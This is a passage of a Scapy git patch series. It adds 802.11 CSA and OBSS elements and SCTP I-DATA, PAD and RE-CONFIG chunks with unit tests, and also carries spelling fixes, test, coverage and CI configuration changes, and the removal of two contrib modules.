+++ b/scapy/layers/bluetooth.py @@ -1523,6 +1523,7 @@ def __init__(self, adapter_index=0): if r != 0: raise BluetoothSocketError("Unable to bind") + self.hci_fd = s self.ins = self.outs = socket.fromfd(s, 31, 3, 1) def send_command(self, cmd): @@ -1564,6 +1565,7 @@ def close(self): if hasattr(self, "ins"): if self.ins and (WINDOWS or self.ins.fileno() != -1): close(self.ins.fileno()) + close(self.hci_fd) conf.BTsocket = BluetoothRFCommSocket From 6c4c2babce60e2adebf5212bfd7be6ba0332aef9 Mon Sep 17 00:00:00 2001 From: Atakan Isbakan Date: Wed, 18 Jan 2023 19:23:23 +0300 Subject: [PATCH 0984/1632] Add 802.11 Channel Switch Announcement (CSA) - 802.11-2016 9.4.2.19 CSA element - 802.11-2016 9.6.2.6 CSA action frame (partial) - test for CSA action frame + element --- scapy/layers/dot11.py | 40 +++++++++++++++++++++++++++++++++++++ test/scapy/layers/dot11.uts | 17 +++++++++++++++- 2 files changed, 56 insertions(+), 1 deletion(-) diff --git a/scapy/layers/dot11.py b/scapy/layers/dot11.py index dcc85e4ef6f..8d02ca6e456 100644 --- a/scapy/layers/dot11.py +++ b/scapy/layers/dot11.py @@ -959,6 +959,7 @@ def network_stats(self): 32: "Power Constraint", 33: "Power Capability", 36: "Supported Channels", + 37: "Channel Switch Announcement", 42: "ERP", 45: "HT Capabilities", 46: "QoS Capability", @@ -1434,6 +1435,19 @@ class Dot11EltMicrosoftWPA(Dot11EltVendorSpecific): ] + Dot11EltRSN.fields_desc[2:8] +# 802.11-2016 9.4.2.19 + +class Dot11EltCSA(Dot11Elt): + name = "802.11 CSA Element" + fields_desc = [ + ByteEnumField("ID", 37, _dot11_id_enum), + ByteField("len", 3), + ByteField("mode", 0), + ByteField("new_channel", 0), + ByteField("channel_switch_count", 0) + ] + + ###################### # 802.11 Frame types # ###################### @@ -1724,6 +1738,30 @@ class Dot11BSSTMResponse(Packet): ] +# 802.11-2016 9.6.2.1 + +class Dot11SpectrumManagement(Packet): + name = "802.11 Spectrum Management Action" + fields_desc = [ + ByteEnumField("action", 0x00, { + 0x00: "Measurement Request", + 0x01: "Measurement Report", + 0x02: "TPC Request", + 0x03: "TPC Report", + 0x04: "Channel Switch Announcement", + }) + ] + + +# 802.11-2016 9.6.2.6 + +class Dot11CSA(Packet): + name = "Channel Switch Announcement Frame" + fields_desc = [ + PacketField("CSA", Dot11EltCSA(), Dot11EltCSA), + ] + + ################### # 802.11 Security # ################### @@ -1890,6 +1928,8 @@ class Dot11CCMP(Dot11Encrypted): bind_layers(Dot11Elt, Dot11Elt,) bind_layers(Dot11TKIP, conf.raw_layer) bind_layers(Dot11CCMP, conf.raw_layer) +bind_layers(Dot11Action, Dot11SpectrumManagement, category=0x00) +bind_layers(Dot11SpectrumManagement, Dot11CSA, action=4) bind_layers(Dot11Action, Dot11WNM, category=0x0A) bind_layers(Dot11WNM, Dot11BSSTMRequest, action=7) bind_layers(Dot11WNM, Dot11BSSTMResponse, action=8) diff --git a/test/scapy/layers/dot11.uts b/test/scapy/layers/dot11.uts index 7a7eea86dc1..4e29969ab5a 100644 --- a/test/scapy/layers/dot11.uts +++ b/test/scapy/layers/dot11.uts @@ -696,4 +696,19 @@ assert pkt[Dot11Action][Dot11WNM][Dot11BSSTMResponse].neighbor_report[0].phy_typ pkt = Dot11(bytes(Dot11()/Dot11Ack())) assert pkt.subtype == 13 -assert pkt.type == 1 \ No newline at end of file +assert pkt.type == 1 + += Dot11CSA + +pkt = RadioTap(b"\x00\x008\x00/@@\xa0 \x08\x00\xa0 \x08\x00\x00\xfe\x83\x06\x10\x00\x00\x00\x00\x10\x02\x8a\t\xa0\x00\xfe\x00\x00\x00\x00\x00\x00\x00\x00\x00\x006\x07\x10\x00\x00\x00\x00\x16\x00\x11\x03\xf8\x00\xfe\x01\xd0\x00\x00\x00\xff\xff\xff\xff\xff\xff\x0cs)d\xa5\r\x0cs)d\xa5\r\xb0!\x00\x04%\x03\x01\x0b\x05\x0b\xb9<\x8c") +assert Dot11SpectrumManagement in pkt +assert Dot11CSA in pkt +assert Dot11EltCSA in pkt + +assert pkt[Dot11Action].category == 0 +assert pkt[Dot11Action][Dot11SpectrumManagement].action == 4 +assert pkt[Dot11Action][Dot11SpectrumManagement][Dot11CSA][Dot11EltCSA].ID == 37 +assert pkt[Dot11Action][Dot11SpectrumManagement][Dot11CSA][Dot11EltCSA].len == 3 +assert pkt[Dot11Action][Dot11SpectrumManagement][Dot11CSA][Dot11EltCSA].mode == 1 +assert pkt[Dot11Action][Dot11SpectrumManagement][Dot11CSA][Dot11EltCSA].new_channel == 11 +assert pkt[Dot11Action][Dot11SpectrumManagement][Dot11CSA][Dot11EltCSA].channel_switch_count == 5 \ No newline at end of file From 2bbd86e7802246f48dea43880fb049601e551103 Mon Sep 17 00:00:00 2001 From: Atakan Isbakan Date: Tue, 31 Jan 2023 15:43:07 +0300 Subject: [PATCH 0985/1632] Add 802.11 Overlapping BSS Scan Parameters (OBSS) - Used in 802.11n 2.4GHz 20/40 MHz coex - 802.11-2016 9.4.2.59 - Add unit test --- scapy/layers/dot11.py | 18 ++++++++++++++++++ test/scapy/layers/dot11.uts | 19 ++++++++++++++++++- 2 files changed, 36 insertions(+), 1 deletion(-) diff --git a/scapy/layers/dot11.py b/scapy/layers/dot11.py index 8d02ca6e456..105d14a9954 100644 --- a/scapy/layers/dot11.py +++ b/scapy/layers/dot11.py @@ -967,6 +967,7 @@ def network_stats(self): 50: "Extended Supported Rates", 52: "Neighbor Report", 61: "HT Operation", + 74: "Overlapping BSS Scan Parameters", 107: "Interworking", 127: "Extendend Capabilities", 191: "VHT Capabilities", @@ -1448,6 +1449,23 @@ class Dot11EltCSA(Dot11Elt): ] +# 802.11-2016 9.4.2.59 + +class Dot11EltOBSS(Dot11Elt): + name = "802.11 OBSS Scan Parameters Element" + fields_desc = [ + ByteEnumField("ID", 74, _dot11_id_enum), + ByteField("len", 14), + LEShortField("Passive_Dwell", 0), + LEShortField("Active_Dwell", 0), + LEShortField("Scan_Interval", 0), + LEShortField("Passive_Total_Per_Channel", 0), + LEShortField("Active_Total_Per_Channel", 0), + LEShortField("Delay", 0), + LEShortField("Activity_Threshold", 0), + ] + + ###################### # 802.11 Frame types # ###################### diff --git a/test/scapy/layers/dot11.uts b/test/scapy/layers/dot11.uts index 4e29969ab5a..ac9e5f0d241 100644 --- a/test/scapy/layers/dot11.uts +++ b/test/scapy/layers/dot11.uts @@ -711,4 +711,21 @@ assert pkt[Dot11Action][Dot11SpectrumManagement][Dot11CSA][Dot11EltCSA].ID == 37 assert pkt[Dot11Action][Dot11SpectrumManagement][Dot11CSA][Dot11EltCSA].len == 3 assert pkt[Dot11Action][Dot11SpectrumManagement][Dot11CSA][Dot11EltCSA].mode == 1 assert pkt[Dot11Action][Dot11SpectrumManagement][Dot11CSA][Dot11EltCSA].new_channel == 11 -assert pkt[Dot11Action][Dot11SpectrumManagement][Dot11CSA][Dot11EltCSA].channel_switch_count == 5 \ No newline at end of file +assert pkt[Dot11Action][Dot11SpectrumManagement][Dot11CSA][Dot11EltCSA].channel_switch_count == 5 + += Dot11OBSS + +data = b'\x00\x008\x00/@@\xa0 \x08\x00\xa0 \x08\x00\x00\x7fB\xe9\n\x00\x00\x00\x00\x10\x16l\t\xa0\x00\xc3\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbf\x9b\xe9\n\x00\x00\x00\x00\x16\x00\x11\x03\xc3\x00\xbf\x01\x80\x00\x00\x00\xff\xff\xff\xff\xff\xff`\x8d&\xa6\xd6\x04`\x8d&\xa6\xd6\x04@S\xe2\xb0\x04\x00\x00\x00\x00\x00d\x00\x11\x14\x00\rArc-QA-Lab-2G\x01\x08\x82\x84\x8b\x96$0Hl\x03\x01\x01\x05\x04\x02\x03\x00\x00\x07\x06AE \x01\r\x14#\x02\x19\x00*\x01\x042\x04\x0c\x12\x18`0\x18\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x04\x02\x00\x00\x0f\xac\x02\x00\x0f\xac\x04\x0c\x00\x0b\x05\x00\x00\xc1\x00\x00F\x053\x00\x00\x00\x006\x03d\x00\x00-\x1a\xef\x19\x17\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00=\x16\x01\x08\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00J\x0e\x14\x00\n\x00,\x01\xc8\x00\x14\x00\x05\x00\x19\x00\x7f\n\x05\x00\x08\x80\x00\x00\x00@\x00@\xff #\x05\x00\x08\x12\x00\x10" \x02\xc0\x0fB\x85\x10\x00\x0c\x00\xea\xff\xea\xffz\x1c\xc7q\x1c\xc7q\x1c\xc7q\xff\x07$\xf4?\x00\x02\xfc\xff\xff\x0e&\x00\x00\xa4\x08 \xa4\x08@C\x08`2\x08\xdd\x1d\x00P\xf2\x04\x10J\x00\x01\x10\x10D\x00\x01\x02\x10<\x00\x01\x03\x10I\x00\x06\x007*\x00\x01 \xdd\x1e\x00\x90L\x04\x18\xbf\x0c\xb1i\x8a\x0f\xea\xff\x00\x00\xea\xff\x00\x00\xc0\x05\x00\x01\x00\x00\x00\xc3\x02\x005\xdd\n\x00\x10\x18\x02\x00\x00\x1c\x00\x00\x01\xdd\x18\x00P\xf2\x02\x01\x01\x80\x00\x03\xa4\x00\x00\'\xa4\x00\x00BC^\x00b2/\x00l\x02\x7f\x00 \x8d\xf4\xe1' +pkt = RadioTap(data) + +assert Dot11EltOBSS in pkt + +assert pkt[Dot11EltOBSS].ID == 74 +assert pkt[Dot11EltOBSS].len == 14 +assert pkt[Dot11EltOBSS].Passive_Dwell == 20 +assert pkt[Dot11EltOBSS].Active_Dwell == 10 +assert pkt[Dot11EltOBSS].Scan_Interval == 300 +assert pkt[Dot11EltOBSS].Passive_Total_Per_Channel == 200 +assert pkt[Dot11EltOBSS].Active_Total_Per_Channel == 20 +assert pkt[Dot11EltOBSS].Delay == 5 +assert pkt[Dot11EltOBSS].Activity_Threshold == 25 From 81b51d00c26d3db36d1a1e2af5ff51d4b7aa7d95 Mon Sep 17 00:00:00 2001 From: Yuxuan Luo Date: Mon, 6 Mar 2023 05:41:48 -0500 Subject: [PATCH 0986/1632] layers/sctp.py: Add support for multiple new chunk types (#3846) * SCTP: add support for I-DATA Adding support for I-DATA chunk based on RFC8260. Signed-off-by: Yuxuan Luo * SCTP: add support for PAD chunk Adding support to forge PAD chunk based on RFC4820 Signed-off-by: Yuxuan Luo * SCTP: add support for RE-CONFIG chunk Adding support to forge RE-CONFIG chunk and corresponding parameters based on RFC6525. Signed-off-by: Yuxuan Luo --------- Signed-off-by: Yuxuan Luo --- scapy/layers/sctp.py | 133 +++++++++++++++++++++++++++++++++++++ test/scapy/layers/sctp.uts | 35 ++++++++++ 2 files changed, 168 insertions(+) diff --git a/scapy/layers/sctp.py b/scapy/layers/sctp.py index acb1edd2c0e..74a909f363b 100644 --- a/scapy/layers/sctp.py +++ b/scapy/layers/sctp.py @@ -159,6 +159,9 @@ def sctp_checksum(buf): 11: "SCTPChunkCookieAck", 14: "SCTPChunkShutdownComplete", 15: "SCTPChunkAuthentication", + 64: "SCTPChunkIData", + 130: "SCTPChunkReConfig", + 132: "SCTPChunkPad", 0x80: "SCTPChunkAddressConfAck", 0xc1: "SCTPChunkAddressConf", } @@ -178,6 +181,9 @@ def sctp_checksum(buf): 11: "cookie-ack", 14: "shutdown-complete", 15: "authentication", + 64: "i-data", + 130: "re-config", + 132: "pad", 0x80: "address-configuration-ack", 0xc1: "address-configuration", } @@ -191,6 +197,12 @@ def sctp_checksum(buf): 9: "SCTPChunkParamCookiePreservative", 11: "SCTPChunkParamHostname", 12: "SCTPChunkParamSupportedAddrTypes", + 13: "SCTPChunkParamOutgoingSSNResetRequest", + 14: "SCTPChunkParamIncomingSSNResetRequest", + 15: "SCTPChunkParamSSNTSNResetRequest", + 16: "SCTPChunkParamReConfigurationResponse", + 17: "SCTPChunkParamAddOutgoingStreamRequest", + 18: "SCTPChunkParamAddIncomingStreamRequest", 0x8000: "SCTPChunkParamECNCapable", 0x8002: "SCTPChunkParamRandom", 0x8003: "SCTPChunkParamChunkList", @@ -214,6 +226,12 @@ def sctp_checksum(buf): 9: "cookie-preservative", 11: "hostname", 12: "addrtypes", + 13: "out-ssn-reset-req", + 14: "in-ssn-reset-req", + 15: "ssn-tsn-reset-req", + 16: "re-configuration-response", + 17: "add-outgoing-stream-req", + 18: "add-incoming-stream-req", 0x8000: "ecn-capable", 0x8002: "random", 0x8003: "chunk-list", @@ -284,6 +302,17 @@ def mysummary(self): # SCTP Chunk variable params +resultcode = { + 0: "Success - Nothing to do", + 1: "Success - Performed", + 2: "Denied", + 3: "Error - Wrong SSN", + 4: "Error - Request already in progress", + 5: "Error - Bad Sequence Number", + 6: "In Progress" +} + + class ChunkParamField(PacketListField): def __init__(self, name, default, count_from=None, length_from=None): PacketListField.__init__(self, name, default, conf.raw_layer, count_from=count_from, length_from=length_from) # noqa: E501 @@ -367,6 +396,62 @@ class SCTPChunkParamSupportedAddrTypes(_SCTPChunkParam, Packet): 4, padwith=b"\x00"), ] +class SCTPChunkParamOutSSNResetReq(_SCTPChunkParam, Packet): + fields_desc = [ShortEnumField("type", 13, sctpchunkparamtypes), + FieldLenField("len", None, length_of="stream_num_list", + adjust=lambda pkt, x:x + 16), + XIntField("re_conf_req_seq_num", None), + XIntField("re_conf_res_seq_num", None), + XIntField("tsn", None), + PadField(FieldListField("stream_num_list", [], + XShortField("stream_num", None), + length_from=lambda pkt: pkt.len - 16), + 4, padwith=b"\x00"), + ] + + +class SCTPChunkParamInSSNResetReq(_SCTPChunkParam, Packet): + fields_desc = [ShortEnumField("type", 14, sctpchunkparamtypes), + FieldLenField("len", None, length_of="stream_num_list", + adjust=lambda pkt, x:x + 8), + XIntField("re_conf_req_seq_num", None), + PadField(FieldListField("stream_num_list", [], + XShortField("stream_num", None), + length_from=lambda pkt: pkt.len - 8), + 4, padwith=b"\x00"), + ] + + +class SCTPChunkParamSSNTSNResetReq(_SCTPChunkParam, Packet): + fields_desc = [ShortEnumField("type", 15, sctpchunkparamtypes), + XShortField("len", 8), + XIntField("re_conf_req_seq_num", None), + ] + + +class SCTPChunkParamReConfigRes(_SCTPChunkParam, Packet): + fields_desc = [ShortEnumField("type", 16, sctpchunkparamtypes), + XShortField("len", 12), + XIntField("re_conf_res_seq_num", None), + IntEnumField("result", None, resultcode), + XIntField("sender_next_tsn", None), + XIntField("receiver_next_tsn", None), + ] + + +class SCTPChunkParamAddOutgoingStreamReq(_SCTPChunkParam, Packet): + fields_desc = [ShortEnumField("type", 17, sctpchunkparamtypes), + XShortField("len", 12), + XIntField("re_conf_req_seq_num", None), + XShortField("num_new_stream", None), + XShortField("reserved", None), + ] + + +class SCTPChunkParamAddIncomingStreamReq(SCTPChunkParamAddOutgoingStreamReq): + type = 18 + + class SCTPChunkParamECNCapable(_SCTPChunkParam, Packet): fields_desc = [ShortEnumField("type", 0x8000, sctpchunkparamtypes), ShortField("len", 4), ] @@ -553,6 +638,34 @@ class SCTPChunkData(_SCTPChunkGuessPayload, Packet): ] +class SCTPChunkIData(_SCTPChunkGuessPayload, Packet): + fields_desc = [ByteEnumField("type", 64, sctpchunktypes), + BitField("reserved", None, 4), + BitField("delay_sack", 0, 1), # immediate bit + BitField("unordered", 0, 1), + BitField("beginning", 0, 1), + BitField("ending", 0, 1), + FieldLenField("len", None, length_of="data", + adjust=lambda pkt, x:x + 20), + XIntField("tsn", None), + XShortField("stream_id", None), + XShortField("reserved_16", None), + XIntField("message_id", None), + MultipleTypeField( + [ + (IntEnumField("ppid_fsn", None, + SCTP_PAYLOAD_PROTOCOL_INDENTIFIERS), + lambda pkt: pkt.beginning == 1), + (XIntField("ppid_fsn", None), + lambda pkt: pkt.beginning == 0), + ], + XIntField("ppid_fsn", None)), + PadField(StrLenField("data", None, + length_from=lambda pkt: pkt.len - 20), + 4, padwith=b"\x00"), + ] + + class SCTPChunkInit(_SCTPChunkGuessPayload, Packet): fields_desc = [ByteEnumField("type", 1, sctpchunktypes), XByteField("flags", None), @@ -700,6 +813,26 @@ class SCTPChunkAddressConf(_SCTPChunkGuessPayload, Packet): ] +class SCTPChunkReConfig(_SCTPChunkGuessPayload, Packet): + fields_desc = [ByteEnumField("type", 130, sctpchunktypes), + XByteField("flags", None), + FieldLenField("len", None, length_of="params", + adjust=lambda pkt, x:x + 4), + ChunkParamField("params", None, length_from=lambda pkt: pkt.len - 4), + ] + + +class SCTPChunkPad(_SCTPChunkGuessPayload, Packet): + fields_desc = [ByteEnumField("type", 132, sctpchunktypes), + XByteField("flags", None), + FieldLenField("len", None, length_of="padding", + adjust=lambda pkt, x:x + 8), + PadField(StrLenField("padding", None, + length_from=lambda pkt: pkt.len - 8), + 4, padwith=b"\x00") + ] + + class SCTPChunkAddressConfAck(SCTPChunkAddressConf): type = 0x80 diff --git a/test/scapy/layers/sctp.uts b/test/scapy/layers/sctp.uts index 676009dfd73..96a04d14d07 100644 --- a/test/scapy/layers/sctp.uts +++ b/test/scapy/layers/sctp.uts @@ -51,6 +51,23 @@ assert p.stream_seq == 0 assert p.len == (len("data") + 16) assert p.data == b"data" += basic SCTPChunkIData - Dissection +~ sctp +blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x02\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x64\x61\x74\x61" +p = SCTP(blob).lastlayer() +assert isinstance(p, SCTPChunkIData) +assert p.reserved == 0 +assert p.delay_sack == 0 +assert p.unordered == 0 +assert p.beginning == 1 +assert p.ending == 0 +assert p.tsn == 0 +assert p.stream_id == 0 +assert p.reserved_16 == 0 +assert p.ppid_fsn == 2 +assert p.len == (len("data") + 20) +assert p.data == b"data" + = basic SCTPChunkInit - Dissection ~ sctp blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" @@ -254,6 +271,24 @@ assert p.len == 8 assert p.seq == 0 assert p.params == [] += basic SCTPChunkPad - Dissection +~ sctp +blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x84\x00\x00\x0b\x70\x61\x64\x00" +p = SCTP(blob).lastlayer() +assert isinstance(p, SCTPChunkPad) +assert p.flags == 0 +assert p.len == 11 +assert p.padding == b'pad' + += basic SCTPChunkReConfig - Dissection +~ sctp +blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x82\x00\x00\x04" +p = SCTP(blob).lastlayer() +assert isinstance(p, SCTPChunkReConfig) +assert p.flags == 0 +assert p.len == 4 +assert p.params == [] + = SCTPChunkParamRandom - Consecutive calls ~ sctp param1, param2 = SCTPChunkParamRandom(), SCTPChunkParamRandom() From 378be02c7bf4d5dadac34008f3a5b979d85882d8 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Wed, 8 Mar 2023 22:05:12 +0100 Subject: [PATCH 0987/1632] fix codespell fix codespell --- .config/codespell_ignore.txt | 2 ++ doc/scapy/layers/automotive.rst | 2 +- scapy/arch/windows/__init__.py | 6 +++--- scapy/contrib/homeplugav.py | 2 +- scapy/layers/bluetooth.py | 2 +- 5 files changed, 8 insertions(+), 6 deletions(-) diff --git a/.config/codespell_ignore.txt b/.config/codespell_ignore.txt index fe284a77e4a..0ca5b425fbf 100644 --- a/.config/codespell_ignore.txt +++ b/.config/codespell_ignore.txt @@ -7,6 +7,7 @@ byteorder cace cas cros +delt doas doubleclick ether @@ -25,6 +26,7 @@ referer ro ser singl +slac te tim ue diff --git a/doc/scapy/layers/automotive.rst b/doc/scapy/layers/automotive.rst index 3bc11285fee..bf74fc3c561 100644 --- a/doc/scapy/layers/automotive.rst +++ b/doc/scapy/layers/automotive.rst @@ -1400,7 +1400,7 @@ To build a small test environment in which you can send SOME/IP messages to and #. | **Vsomeip setup** - Download the vsomeip library on the Rapsberry, apply the git patch so it can work with the newer boost libraries and then install it. + Download the vsomeip library on the Raspberry, apply the git patch so it can work with the newer boost libraries and then install it. :: diff --git a/scapy/arch/windows/__init__.py b/scapy/arch/windows/__init__.py index ecca1bd1460..8f5bce3d9ab 100755 --- a/scapy/arch/windows/__init__.py +++ b/scapy/arch/windows/__init__.py @@ -476,15 +476,15 @@ def setchannel(self, channel): self._check_npcap_requirement() return self._npcap_set("channel", str(channel)) - def frequence(self): + def frequency(self): # type: () -> int - """Get the frequence of the interface. + """Get the frequency of the interface. Only available with Npcap.""" # According to https://nmap.org/npcap/guide/npcap-devguide.html#npcap-feature-dot11 # noqa: E501 self._check_npcap_requirement() return int(self._npcap_get("freq")) - def setfrequence(self, freq): + def setfrequency(self, freq): # type: (int) -> bool """Set the channel of the interface (1-14): Only available with Npcap.""" diff --git a/scapy/contrib/homeplugav.py b/scapy/contrib/homeplugav.py index c4e79fac65f..d408815a38d 100644 --- a/scapy/contrib/homeplugav.py +++ b/scapy/contrib/homeplugav.py @@ -98,7 +98,7 @@ # Qualcomm Vendor Specific Management Message Types; # # from https://github.com/qca/open-plc-utils/blob/master/mme/qualcomm.h # ######################################################################### -# Commented commands are already in HPAVTypeList, the other have to be implemted # noqa: E501 +# Commented commands are already in HPAVTypeList, the other have to be implemented # noqa: E501 QualcommTypeList = { # 0xA000 : "VS_SW_VER", 0xA004: "VS_WR_MEM", # 0xA008 : "VS_RD_MEM", diff --git a/scapy/layers/bluetooth.py b/scapy/layers/bluetooth.py index a584e4bf696..293914a5b0f 100644 --- a/scapy/layers/bluetooth.py +++ b/scapy/layers/bluetooth.py @@ -197,7 +197,7 @@ class HCI_PHDR_Hdr(Packet): 0x05: "insufficient auth", 0x06: "unsupported req", 0x07: "invalid offset", - 0x08: "insuficient author", + 0x08: "insufficient author", 0x09: "prepare queue full", 0x0a: "attr not found", 0x0b: "attr not long", From 181aa4d5149fbf1b19fbf93650bc9a62ab948138 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Thu, 9 Mar 2023 21:58:23 +0100 Subject: [PATCH 0988/1632] Minor tests & coverage fixes (#3924) * Lord of the fix: The Return of the tests * Various minor test fixes * Appveyor: use new codecov * Better codecov rules --- .appveyor.yml | 3 ++- pyproject.toml | 10 +++------- test/imports.uts | 1 + test/linux.uts | 17 ++++++++++------- test/pipetool.uts | 3 ++- test/regression.uts | 2 +- tox.ini | 21 ++++----------------- 7 files changed, 23 insertions(+), 34 deletions(-) diff --git a/.appveyor.yml b/.appveyor.yml index c3f0d173c39..65292730e40 100644 --- a/.appveyor.yml +++ b/.appveyor.yml @@ -50,4 +50,5 @@ test_script: after_test: # Run codecov - - "%PYTHON%\\python -m tox -e codecov" + - ps: $ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest -Uri https://uploader.codecov.io/latest/windows/codecov.exe -Outfile codecov.exe + - codecov.exe diff --git a/pyproject.toml b/pyproject.toml index ef7f4453fac..382201cdce9 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -79,18 +79,14 @@ version = { attr="scapy.VERSION" } # coverage -[tool.coverage] -concurrency = "multiprocessing" +[tool.coverage.run] +concurrency = [ "thread", "multiprocessing" ] +source = [ "scapy" ] omit = [ # Scapy specific paths "scapy/tools/UTscapy.py", - "test/*", # Scapy external modules "scapy/libs/six.py", "scapy/libs/winpcapy.py", "scapy/libs/ethertypes.py", - # .tox specific path - ".tox/*", - # OS specific paths - "/private/*", ] diff --git a/test/imports.uts b/test/imports.uts index 5984fe57260..a9dca268acc 100644 --- a/test/imports.uts +++ b/test/imports.uts @@ -1,4 +1,5 @@ % Import tests +~ not_pypy + Import tests ~ imports diff --git a/test/linux.uts b/test/linux.uts index 589f1897ac0..67d0d7ba3dd 100644 --- a/test/linux.uts +++ b/test/linux.uts @@ -134,15 +134,14 @@ with patch("scapy.layers.l2.get_if_hwaddr") as mgih: conf.iface = bck_conf_iface conf.route6.resync() -= IPv6 -~ linux += IPv6 - check OS routes +~ linux ipv6 addrs = in6_getifaddr() -if len(addrs) == 0: - assert True -else: - assert all([in6_isvalid(addr[0]) for addr in in6_getifaddr()]) - assert set([addr[2] for addr in in6_getifaddr()]) == conf.route6.ipv6_ifaces +if addrs: + assert all(in6_isvalid(addr[0]) for addr in in6_getifaddr()), 'invalid ipv6 address' + ifaces6 = [addr[2] for addr in in6_getifaddr()] + assert all(iface in ifaces6 for iface in conf.route6.ipv6_ifaces), 'ipv6 interface has route but no real' = veth interface error handling @@ -314,8 +313,12 @@ assert _interface_selection(None, IP(dst="8.8.8.8")/UDP()) == conf.iface exit_status = os.system("ip link add name scapy0 type dummy") exit_status = os.system("ip addr add 192.0.2.1/24 dev scapy0") exit_status = os.system("ip link set scapy0 up") +conf.ifaces.reload() +conf.route.resync() assert _interface_selection(None, IP(dst="192.0.2.42")/UDP()) == "scapy0" exit_status = os.system("ip link del name dev scapy0") +conf.ifaces.reload() +conf.route.resync() = Test 802.Q sniffing ~ linux needs_root veth diff --git a/test/pipetool.uts b/test/pipetool.uts index c1673b25f99..7689e52d998 100644 --- a/test/pipetool.uts +++ b/test/pipetool.uts @@ -720,5 +720,6 @@ s.send(bytes(HTTP()/HTTPRequest(Host="www.google.com"))) result = c.q.get(timeout=10) p.stop() -assert result.startswith(b"HTTP/1.1 200 OK") +result +assert result.startswith(b"HTTP/1.1 200 OK") or result.startswith(b"HTTP/1.1 302 Found") diff --git a/test/regression.uts b/test/regression.uts index 338ece79135..6797ca7c6cb 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -225,7 +225,7 @@ except: assert not conf.use_bpf = Configuration conf.use_pcap -~ linux +~ linux libpcap if not conf.use_pcap: assert not conf.iface.provider.libpcap diff --git a/tox.ini b/tox.ini index 50466219968..cd85bd7c808 100644 --- a/tox.ini +++ b/tox.ini @@ -3,8 +3,8 @@ [tox] -envlist = py{27,34,35,36,37,38,39,310,py27,py39}-{linux,bsd}_{non_root,root}, - py{27,34,35,36,37,38,39,310,py27,py39}-windows, +envlist = py{27,34,35,36,37,38,39,310,311,py27,py39}-{linux,bsd}_{non_root,root}, + py{27,34,35,36,37,38,39,310,311,py27,py39}-windows, skip_missing_interpreters = true minversion = 4.0 @@ -44,6 +44,7 @@ commands = bsd_non_root: {envpython} {env:SCAPY_PY_OPTS:-m coverage run} -m scapy.tools.UTscapy -c test/configs/bsd.utsc -K manufdb -K tshark -N {posargs} bsd_root: sudo -E {envpython} {env:SCAPY_PY_OPTS:-m coverage run} -m scapy.tools.UTscapy -c test/configs/bsd.utsc -K manufdb -K tshark {posargs} windows: {envpython} {env:SCAPY_PY_OPTS:-m coverage run} -m scapy.tools.UTscapy -c test/configs/windows.utsc {posargs} + coverage combine coverage xml -i # Variants of the main tests @@ -72,6 +73,7 @@ commands = bash -c "rm -rf /tmp/can-utils /tmp/can-isotp" lsmod sudo -E {envpython} -m coverage run -m scapy.tools.UTscapy -c ./test/configs/linux.utsc {posargs} + coverage combine coverage xml -i # Test used by upstream pyca/cryptography @@ -83,21 +85,6 @@ commands = python -c "import cryptography; print('DEBUG: cryptography %s' % cryptography.__version__)" python -m scapy.tools.UTscapy -c ./test/configs/cryptography.utsc -# Specific functions or tests - -[testenv:codecov] -description = "Upload coverage results to codecov" -passenv = - TOXENV - CI - TRAVIS - TRAVIS_* - APPVEYOR - APPVEYOR_* -deps = codecov -commands = codecov -e TOXENV - - # The files listed past the first argument of the sphinx-apidoc command are ignored [testenv:apitree] description = "Regenerates the API reference doc tree" From d05de38207a1775adb6db6c5c3f635fc0c993dcd Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 12 Mar 2023 13:58:00 +0100 Subject: [PATCH 0989/1632] Several contrib layers cleanups (#3939) --- .config/ci/test.sh | 3 + pyproject.toml | 4 +- scapy/__init__.py | 2 +- scapy/contrib/ubberlogger.py | 119 ----------------------------------- scapy/contrib/wpa_eapol.py | 41 ------------ scapy/layers/eap.py | 106 ++++++++++++++++++++++++++++--- test/scapy/layers/eap.uts | 15 +++++ tox.ini | 14 ++--- 8 files changed, 124 insertions(+), 180 deletions(-) delete mode 100644 scapy/contrib/ubberlogger.py delete mode 100644 scapy/contrib/wpa_eapol.py diff --git a/.config/ci/test.sh b/.config/ci/test.sh index ef365c723a9..30e43fa2a8d 100755 --- a/.config/ci/test.sh +++ b/.config/ci/test.sh @@ -52,6 +52,9 @@ fi if python --version 2>&1 | grep -q PyPy then UT_FLAGS+=" -K not_pypy" + # Code coverage with PyPy makes it very, very slow. Tests work + # but take around 30minutes, so we disable it. + export DISABLE_COVERAGE=" " fi # libpcap diff --git a/pyproject.toml b/pyproject.toml index 382201cdce9..6ac3197697c 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -83,8 +83,8 @@ version = { attr="scapy.VERSION" } concurrency = [ "thread", "multiprocessing" ] source = [ "scapy" ] omit = [ - # Scapy specific paths - "scapy/tools/UTscapy.py", + # Scapy tools + "scapy/tools/", # Scapy external modules "scapy/libs/six.py", "scapy/libs/winpcapy.py", diff --git a/scapy/__init__.py b/scapy/__init__.py index 72f73fd1f66..53cd99229cc 100644 --- a/scapy/__init__.py +++ b/scapy/__init__.py @@ -158,7 +158,7 @@ def _version(): VERSION = __version__ = _version() -_tmp = re.search(r"[0-9.]+", VERSION) +_tmp = re.search(r"([0-9]|\.[0-9])+", VERSION) VERSION_MAIN = _tmp.group() if _tmp is not None else VERSION if __name__ == "__main__": diff 